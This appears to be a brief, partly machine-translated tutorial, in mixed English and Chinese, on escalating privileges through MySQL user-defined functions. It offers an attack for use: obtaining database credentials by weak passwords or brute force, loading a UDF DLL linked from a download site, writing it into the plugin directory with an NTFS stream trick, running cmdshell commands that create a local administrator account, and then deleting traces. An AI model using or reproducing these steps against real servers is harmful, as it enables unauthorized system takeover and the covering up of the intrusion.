The right of-----mysql-udf

1. Summary of the method of extracting rights on UDFs

Through the weak password, blasting, Web site configuration files and other ways to get the MySQL database account password,---to be able to connect

(1). Declare the 16 decimal number of the Udf.dll code to the my_udf_a variable

set @my_udf_a=concat(‘‘,dll的16进制);

(2). Build table My_udf_data, field data, type Longblob.

Udf.dll
Https://pan.baidu.com/s/1FY8Ej1tMDGdbb5OEcx3BgA

create table my_udf_data(data LONGBLOB);

(3) Update the My_udf_data table to the data in the @my_udf_a.

insert into my_udf_data values("");update my_udf_data set data = @my_udf_a;

(4) View DLL export path

Mysql<5.0，导出路径随意;5.0<=mysql<5.1，则需要导出至目标服务器的系统目录（如：system32），否则在下一步操作中你会看到“No paths allowed for shared library”错误;mysql>5.1，需要导出dll到插件路径，插件路径可以用下面这条命令查看:show variables like ‘%plugin%‘;

(5) Export the DLL

The name of the. dll can be named arbitrarily

* In some cases , we will encounter the situation of can ' t open shared library, we need to export Udf.dll to Lib\plugin directory, but by default, plugin does not exist, what should I do? It's good to have Daniel. Methods of creating folders using NTFS ads streams

select @@basedir;  //查找到mysql的目录select ‘It is dll‘ into dumpfile ‘C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION‘;  //利用NTFS ADS创建lib目录select ‘It is dll‘ into dumpfile ‘C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION‘;//利用NTFS ADS创建plugin目录

(6) The right to be raised by Cmdshell function

select cmdshell(‘net user x x /add‘);

select cmdshell(‘net localgroup administrators x /add‘);

(7) Erase traces:

drop table my_udf_data;drop function cmdshell;

2.UDF Trojan Lift Right

Enter the database account password

Follow the instructions to

The right of-----mysql-udf